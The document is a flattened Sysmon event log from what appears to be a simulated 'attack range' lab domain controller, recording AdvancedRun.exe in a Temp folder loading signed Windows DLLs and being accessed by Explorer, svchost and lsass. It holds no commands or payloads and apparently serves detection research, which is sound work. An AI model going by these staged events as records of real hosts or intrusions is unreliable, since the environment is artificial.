10341000x80000000000000003928848Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.459{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928847Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:11:37.459{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928846Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.459{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000003928841Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.349{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928840Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:11:37.334{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928839Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.272{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928838Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.272{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928837Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.272{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928836Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.272{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003928835Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.272{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003928834Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:11:37.272{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003928833Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.272{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003928832Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:11:37.272{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003928831Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928830Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928829Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928828Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928827Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003928826Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928825Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928824Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928823Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928822Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928821Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928820Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft 
CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928819Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928818Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928817Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003928816Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928815Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928814Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928813Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928812Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928811Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928810Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft 
CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928809Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928808Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928807Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003928806Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928805Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928804Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928803Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928802Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928801Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 